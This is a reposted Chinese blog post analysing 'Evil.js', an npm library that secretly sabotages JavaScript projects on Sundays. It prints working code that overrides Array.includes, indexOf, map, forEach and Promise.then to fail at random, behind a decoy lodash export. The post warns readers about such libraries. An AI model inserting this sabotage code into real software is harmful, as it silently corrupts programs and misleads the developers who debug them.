美文网首页
一个针对离职前端的NPM库

一个针对离职前端的NPM库

作者: 涅槃快乐是金 | 来源:发表于2022-08-19 23:18 被阅读0次

    背景

    今天在群里面看到一个图

    说这个Evil.js是为了让你离职前不删库跑而诞生的

    他会让你的项目在周日的时候出现以下神奇的效果:

    • 当数组长度可以被7整除时,Array.includes 永远返回false。
    • Array.map 有5%概率会丢失最后一个元素。
    • Array.filter 的结果有5%的概率丢失最后一个元素。
    • Array.forEach 会卡死一段时间。
    • setTimeout 总是会比预期时间慢1秒才触发。
    • Promise.then 有10%概率不会触发。
    • JSON.stringify 有30%概率会把I(大写字母I)变成l(小写字母L)。
    • Date.getTime() 的结果总是会慢一个小时。
    • localStorage.getItem 有5%几率返回空字符串。
    • Math.random() 的取值范围改为0到1.1

    这样你的公司项目在周日的时候便会出现意想不到的神奇效果。

    我们来看看他是如何实现的

    源码地址:https://github.com/wheatup/ev...

    大概只有150行

    源码大概的一个结构是:

    const lodash = typeof require !== 'undefined' ? require('lodash') : {};

((global)=>

//do something
})((0, eval)('this'));

var _ = lodash;
if (typeof module !== 'undefined') {
    // decoy export
    module.exports = _;
}

    主要业务逻辑都是在IIFE中。

    首先IIFE中会判断当前是否周日

        // 只有周日才注入,当周日产生bug时,工作日程序员进行debug时将不会进行复现
    // Skip if it's not Sunday
    if (new Date().getDay() !== 0) return;

    通过重写数组的原型链上方法,includes方法当数组长度可以被7整除时,永远返回false

    /**
     * If the array size is devidable by 7, this function aways fail
     * @zh 当数组长度可以被7整除时,本方法永远返回false
     */
    const _includes = Array.prototype.includes;
    const _indexOf = Array.prototype.indexOf;
    Array.prototype.includes = function (...args) {
        if (this.length % 7 !== 0) {
            return _includes.call(this, ...args);
        } else {
            return false;
        }
    };
    Array.prototype.indexOf = function (...args) {
        if (this.length % 7 !== 0) {
            return _indexOf.call(this, ...args);
        } else {
            return -1;
        }
    };

    5%的几率让map方法丢失一个元素

    /**
     * Array.map has 5% chance drop the last element
     * @zh Array.map方法的结果有5%几率丢失最后一个元素
     */
    const _map = Array.prototype.map;
    Array.prototype.map = function (...args) {
        result = _map.call(this, ...args);
        if (_rand() < 0.05) {
            result.length = Math.max(result.length - 1, 0);
        }
        return result;
    }

    forEach方法会卡死一段时间(通过for循环阻塞)

    /**
     * Array.forEach will will cause a significant lag
     * @zh Array.forEach会卡死一段时间
     */
    const _forEach = Array.prototype.forEach;
    Array.prototype.forEach = function(...args) {
        for(let i = 0; i <= 1e7; i++);
        return _forEach.call(this, ...args);
    }

    最骚的是这个,Promise.then方法10%概率不会触发

    /**
     * Promise.then has a 10% chance will not trigger
     * @zh Promise.then 有10%几率不会触发
     */
    const _then = Promise.prototype.then;
    Promise.prototype.then = function (...args) {
        if (_rand() < 0.1) {
            return new Promise(() => {});
        } else {
            return _then.call(this, ...args);
        }
    }

    这简直会让你的项目无法开发和维护,无法定位问题。.then方法是整个ES6的异步核心API

    结论

    我们不要随便引入一个npm库,他如果修改原型上的方法可以做到攻击甚至有安全隐患。

    相关文章

      网友评论

          本文标题:一个针对离职前端的NPM库

          本文链接:https://www.haomeiwen.com/subject/evkpgrtx.html

          延伸阅读

          深度阅读

          • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

          栏目导航

          热点阅读

          关于我们|服务条款|联系我们|一个针对离职前端的NPM库|投稿指南|网站地图|RSS订阅|排版工具|手机版

          提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

          Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

          备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

          本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

          所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!